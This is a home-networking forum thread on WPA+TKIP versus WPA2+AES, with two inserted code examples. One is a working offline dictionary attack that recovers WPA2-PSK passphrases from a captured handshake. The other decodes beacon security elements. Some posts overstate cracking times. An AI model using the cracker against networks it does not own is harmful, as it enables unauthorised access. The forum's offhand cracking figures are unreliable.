WPA2+AES overkill as compared to WPA+TKIP for general Home use ?

pfm

Occasional Visitor
I know WPA2+AES would be best for security and I would just go with that, I always have, but recently I switched my ISP and the modem+router gateway they gave me is terrible at performance and connectivity with WPA2+AES but works fine with WPA+TKIP.
This is about a home, which is far from a corporate data mine with other people's personal information at stake, for which you could be sued for millions or go out of business. There would be no "network storage" hooked up to this home network either.

So that made me wonder: is WPA+TKIP all that bad for just general home use? Like streaming video, audio, games, browsing, and perhaps online banking, taxes and online shopping.

Since we are talking about "wifi" security, obviously someone would have to be within close range of the router, like sitting outside my home, to do anything if they wanted to. What are the chances of that? It's not like I live in a parking lot.

Finally (sorry, I know this is getting longer than I thought it would), my point is: there is always "ultimate" security available. Google might (and should) put four steel doors with seven locks on each, but would you do that for your patio door even if you could?

{edit:} Anyone know if it has ever happened that a WPA+TKIP secured home network was broken into?

Your thoughts and opinions are welcome and highly appreciated.
Thanks!
 
I would be motivated to make WPA2/AES work...take a look at this article to see why:

http://www.smallnetbuilder.com/wireless/wireless-basics/30664-5-ways-to-fix-slow-80211n-speed

Using WPA/TKIP you can't get your wireless to go any faster than 54 Mbps, which is pretty slow these days. Wireless-N can go up to about 450 Mbps with the right hardware, and Wireless-AC much faster, about 1300 Mbps, also with the right hardware... but you need WPA2/AES to get above 54 Mbps at all.
 
Hi,
For security and speed there is no such thing as overkill. Always underkill, LOL! Same goes for safety, no such thing as too much safety as far as I am concerned.
 
Consider the fact that wireless signals are broadcast at large, and therefore accessible by anyone on the street. Failing to apply basic security measures such as WPA2/AES can result in your POP3 login info being stolen by someone just passing by on the street, for example (very few people actually use TLS/SSL when connecting to their email server).
 
I would be motivated to make WPA2/AES work...take a look at this article to see why:

http://www.smallnetbuilder.com/wireless/wireless-basics/30664-5-ways-to-fix-slow-80211n-speed

Using WPA/TKIP you can't get your wireless to go any faster than 54 Mbps, which is pretty slow these days. Wireless-N can go up to about 450 Mbps with the right hardware, and Wireless-AC much faster, about 1300 Mbps, also with the right hardware... but you need WPA2/AES to get above 54 Mbps at all.

I was going to post something along these lines.

To get truly high speed wireless you HAVE to use WPA2/AES.
 
Even without the speed hit, WPA is equivalent to not securing your network at all.

In January 2012 a post (different forum) was made that with a then six year old MacBook Pro, the password was cracked in 2.5 hours.

Translated to a current laptop in May 2014: less than a minute to get inside. :)
 
I know WPA2+AES would be best for security and I would just go with that, I always have, but recently I switched my ISP and the modem+router gateway they gave me is terrible at performance and connectivity with WPA2+AES but works fine with WPA+TKIP.
This is about a home, which is far from a corporate data mine with other people's personal information at stake, for which you could be sued for millions or go out of business. There would be no "network storage" hooked up to this home network either.

So that made me wonder: is WPA+TKIP all that bad for just general home use? Like streaming video, audio, games, browsing, and perhaps online banking, taxes and online shopping.

Since we are talking about "wifi" security, obviously someone would have to be within close range of the router, like sitting outside my home, to do anything if they wanted to. What are the chances of that? It's not like I live in a parking lot.

Finally (sorry, I know this is getting longer than I thought it would), my point is: there is always "ultimate" security available. Google might (and should) put four steel doors with seven locks on each, but would you do that for your patio door even if you could?

{edit:} Anyone know if it has ever happened that a WPA+TKIP secured home network was broken into?

Your thoughts and opinions are welcome and highly appreciated.
Thanks!

Honestly, this doesn't make sense... but we only have half of the scenario/use case...

All modern WiFi chipsets do AES/WPA2 in a dedicated logic block on the wifi chipset; this has been so for some time. Basically it's done in hardware, so it should be totally transparent.

Some older 802.11b/g/a chipsets support WPA and WPA2 but do it in SW, at a significant performance penalty. But again, this is an outlier, as most 802.11g chipsets since about '09 or so have WPA2 support in HW...

To be helpful here, provide the chipset, driver and host OS; then folks might be able to provide more assistance.

WPA2/AES is the best course here, for security as well as performance in 802.11n space.

sfx
 
So explain to me: what does "get inside" mean? Meaning they can use my wifi for internet? Or get into the router as 'admin' and change settings? Or get into a computer connected to the network and open or copy files out?

Good point on the speed, but the sad irony is that this lousy POS gateway that Comcast has sent me trips over itself when using WPA2/AES. I have to use WPA/TKIP to maintain wifi peace in the house.

{edit:} sfx2000, saw your post after I replied. It is an ARRIS TG862G. I don't know which version exactly, but I can find out.
 
As to your question, all of the above.

Simply translating all of the traffic over your WLAN won't just let them waltz into any computer they want, but it is the critical first step to doing it, and generally, since it is on the local network then, it is much easier to do whatever they want (i.e. there isn't that much security once you are on the internal network).

Ask for a new cable modem/router combo. If it is ancient, they should give you one. You ARE renting it, I assume, therefore you should demand something better from them since you are paying for it.

Also, for distance: your WLAN might only be "readable" at a couple of hundred feet on something like a regular laptop, but just stick a high-gain antenna on there, even if you don't have one on your end, and you can read a wifi network easily from half a mile or more if you have line of sight to it.

Doesn't make it likely that someone would ever do that... but it also isn't that likely that someone is going to try your windows and doors to see if they are unlocked to break into your house.

I still lock my windows and doors when I am not home.

Even WPA2/AES is breakable given time and motivation, but it generally takes a LOT of time and motivation to be able to do it. WPA2/TKIP and other lesser encryption forms take minutes with a reasonably new computer to break the encryption. WPA2/AES is more like 24+ hrs of listening in (more for association chatter than anything) to have a chance of breaking it. If there isn't a lot of association chatter on your network and you used a sufficiently long and complex wifi password, odds are excellent that it might even take weeks to crack your WPA2/AES WLAN encryption.

Things like WPS make it even faster, which is why you NEVER EVER want to use WPS. With WPS enabled you can often break the encryption in minutes rather than days if you have WPA2/AES. WEP is just a joke. That is practically seconds these days with a newer computer.
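What the cracking estimates in this thread boil down to, as an added example that is not part of any post here: once an eavesdropper has captured one WPA2-PSK four-way handshake, the attack is entirely offline. For each candidate passphrase they compute the PMK (PBKDF2-HMAC-SHA1, 4096 iterations, salted with the SSID), expand it to the PTK with the two MAC addresses and the two nonces that are sent in the clear, and recompute the MIC on message 2 of the handshake; a match means the guess is right. The per-guess cost is one PBKDF2, so the length and unpredictability of the passphrase is what decides whether this takes minutes or never finishes. The key derivation below follows IEEE 802.11i; the "captured" handshake is constructed (fixed addresses and nonces, SSID "IEEE", passphrase "password", which is the 802.11i Annex test vector), and WPS does not come into it.

```python
"""WPA2-PSK four-way handshake: derive the keys the way the AP and the client do,
then run the offline dictionary attack an eavesdropper runs against a capture.
Added example, not code from the thread. The handshake is CONSTRUCTED
(fixed addresses and nonces); the key derivation follows IEEE 802.11i."""
import hashlib
import hmac
import time

MIC_OFFSET = 81     # MIC field inside an EAPOL-Key frame (4-byte EAPOL header + 77 bytes)
NONCE_OFFSET = 17   # Key Nonce field

# Constructed capture parameters; an attacker reads every one of these off the air.
SSID = "IEEE"
AA = bytes.fromhex("001122334455")    # AP MAC (constructed)
SPA = bytes.fromhex("66778899aabb")   # client MAC (constructed)
ANONCE = bytes(range(32))             # fixed instead of random so the run is reproducible
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/CCMP/PSK


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
    Those 4096 iterations are the only per-guess cost the attacker pays."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: str, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(hmac.new(key, label.encode() + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, "Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the frame with the MIC field
    zeroed, keyed with KCK = PTK[0:16], truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, key_data: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 with the MIC still zeroed."""
    body = (b"\x02"                       # descriptor type: RSN
            + b"\x01\x0a"                 # key info: pairwise, MIC present, HMAC-SHA1/AES
            + b"\x00\x10"                 # key length
            + b"\x00" * 7 + b"\x01"       # replay counter
            + snonce                      # SNonce
            + b"\x00" * 16                # key IV
            + b"\x00" * 8                 # key RSC
            + b"\x00" * 8                 # key ID
            + b"\x00" * 16                # MIC, filled in by sign_frame()
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type Key


def sign_frame(frame: bytes, kck: bytes) -> bytes:
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def make_capture(passphrase: str) -> bytes:
    """What the legitimate client sends as message 2 when it knows the passphrase."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    return sign_frame(build_msg2(SNONCE, RSN_IE), ptk[:16])


def crack_handshake(ssid: str, aa: bytes, spa: bytes, anonce: bytes, msg2: bytes, candidates):
    """Offline attack: one PBKDF2 per candidate, accept when the MIC matches.
    Returns (passphrase or None, number of guesses made)."""
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    tried = 0
    for guess in candidates:
        tried += 1
        kck = ptk_from_pmk(pmk_from_passphrase(guess, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), mic):
            return guess, tried
    return None, tried


if __name__ == "__main__":
    capture = make_capture("password")
    wordlist = ["letmein", "wireless", "qwerty123", "password", "dragon"]
    t0 = time.perf_counter()
    found, tried = crack_handshake(SSID, AA, SPA, ANONCE, capture, wordlist)
    per_guess_ms = 1000 * (time.perf_counter() - t0) / tried
    print("recovered %r after %d guesses, %.1f ms per guess on this CPU" % (found, tried, per_guess_ms))
```

The per-guess time printed at the end is the whole story: divide the size of the keyspace your passphrase lives in by the number of guesses per second an attacker can afford (a GPU does orders of magnitude better than this Python loop) and you have how long the encryption holds. Nothing about listening longer helps the attacker once a single complete handshake is on disk.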
 
Ask for a new cable modem/router combo. If it is ancient, they should give you one. You ARE renting it, I assume, therefore you should demand something better from them since you are paying for it.

This.

It sounds to me like the device they gave you is malfunctioning. Call them and tell them you want it replaced. Tell them that compromising your personal security isn't something you're willing to do.
 
One follow-up question: if the router has both WPA and WPA2 enabled, as well as AES and TKIP enabled, and I use all my devices with WPA2/AES except say one, like a TV or Roku or such, then am I still exposing all devices on the network to risk? Even though only one device is using the less secure connection?
 
Typically the wireless encryption has very little effect on throughput with modern routers. WPA2 in either flavor is fine.
 
One follow-up question: if the router has both WPA and WPA2 enabled, as well as AES and TKIP enabled, and I use all my devices with WPA2/AES except say one, like a TV or Roku or such, then am I still exposing all devices on the network to risk? Even though only one device is using the less secure connection?

Yep.

Your router is only as secure as the weakest link.
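What "weakest link" means on the wire, as an added example that is not from any post in this thread: a router in mixed WPA/WPA2, TKIP/AES mode advertises that configuration in the RSN and WPA information elements of every beacon and probe response. Decoding them shows two things. First, the AP must pick a group (broadcast/multicast) cipher that every associated client can use, so in mixed mode the group cipher is TKIP for the AES clients as well. Second, a client whose pairwise cipher is TKIP is not allowed 802.11n HT rates, which is the 54 Mbps ceiling mentioned earlier in the thread. The element bytes below are constructed; the field layout follows IEEE 802.11.

```python
"""Decode the RSN (WPA2) and WPA information elements an access point advertises
and report the security-relevant facts. Added example, not code from the thread;
the element bytes at the bottom are CONSTRUCTED."""
import struct
from dataclasses import dataclass, field

RSN_OUI = bytes.fromhex("000fac")   # IEEE 802.11 suite selectors (RSN / WPA2)
WPA_OUI = bytes.fromhex("0050f2")   # Wi-Fi Alliance selectors (original WPA)
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP", 5: "WEP-104"}
AKMS = {1: "802.1X", 2: "PSK"}


@dataclass
class SecurityIE:
    kind: str                  # "RSN" (WPA2) or "WPA"
    group: str                 # cipher protecting broadcast/multicast frames
    pairwise: list = field(default_factory=list)   # ciphers a client may pick for unicast
    akm: list = field(default_factory=list)        # key management: PSK or 802.1X


def _suite(raw: bytes, oui: bytes, table: dict) -> str:
    if raw[:3] != oui:
        return "vendor:" + raw.hex()
    return table.get(raw[3], "unknown:%d" % raw[3])


def _suite_list(body: bytes, pos: int, oui: bytes, table: dict):
    (count,) = struct.unpack_from("<H", body, pos)
    pos += 2
    suites = [_suite(body[pos + 4 * i:pos + 4 * i + 4], oui, table) for i in range(count)]
    return suites, pos + 4 * count


def parse_security_ie(ie: bytes) -> SecurityIE:
    """Decode one element: ID 48 = RSN, or ID 221 with the WPA OUI and type 1 = WPA."""
    eid, length = ie[0], ie[1]
    body = ie[2:2 + length]
    if len(body) != length:
        raise ValueError("truncated element")
    if eid == 48:
        kind, oui = "RSN", RSN_OUI
    elif eid == 221 and body[:4] == WPA_OUI + b"\x01":
        kind, oui = "WPA", WPA_OUI
        body = body[4:]                      # skip OUI + type; the rest mirrors RSN
    else:
        raise ValueError("not an RSN/WPA element")
    (version,) = struct.unpack_from("<H", body, 0)
    if version != 1:
        raise ValueError("unsupported version %d" % version)
    group = _suite(body[2:6], oui, CIPHERS)
    pairwise, pos = _suite_list(body, 6, oui, CIPHERS)
    akm, pos = _suite_list(body, pos, oui, AKMS)
    return SecurityIE(kind, group, pairwise, akm)


def assess(elements: list) -> list:
    """Findings for an AP that advertises these elements together."""
    pairwise = {c for e in elements for c in e.pairwise}
    groups = {e.group for e in elements}
    findings = []
    if "TKIP" in pairwise:
        findings.append("TKIP clients accepted: a TKIP-only device can join this network")
    if "TKIP" in groups:
        findings.append("group cipher is TKIP: broadcast/multicast traffic of every client, "
                        "including the CCMP ones, is protected by TKIP")
    if "CCMP" not in pairwise:
        findings.append("no CCMP pairwise cipher: no 802.11n HT rates, links stay at legacy rates")
    if any(c.startswith("WEP") for c in pairwise | groups):
        findings.append("WEP cipher advertised")
    return findings


# Constructed elements: WPA2/AES only; mixed WPA2 with TKIP+AES; and a WPA/TKIP element.
EXAMPLE_CCMP_ONLY = bytes.fromhex("3014" "0100" "000fac04" "0100" "000fac04" "0100" "000fac02" "0000")
EXAMPLE_MIXED = bytes.fromhex("3018" "0100" "000fac02" "0200" "000fac04" "000fac02" "0100" "000fac02" "0000")
EXAMPLE_WPA_TKIP = bytes.fromhex("dd16" "0050f201" "0100" "0050f202" "0100" "0050f202" "0100" "0050f202")

if __name__ == "__main__":
    for label, ies in (("WPA2/AES only", [EXAMPLE_CCMP_ONLY]),
                       ("WPA/WPA2 mixed, TKIP+AES", [EXAMPLE_MIXED, EXAMPLE_WPA_TKIP])):
        parsed = [parse_security_ie(ie) for ie in ies]
        print(label)
        for p in parsed:
            print("  %s: group=%s pairwise=%s akm=%s" % (p.kind, p.group, p.pairwise, p.akm))
        for f in assess(parsed) or ["no findings"]:
            print("  -", f)
```

On Linux, `iw dev wlan0 scan` prints the same fields ("Group cipher", "Pairwise ciphers", "Authentication suites") for each network in range, so you can check what your own gateway is advertising without any code. If the group cipher reads TKIP while you believe you are on WPA2/AES, the one TKIP device is costing the whole network.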
 
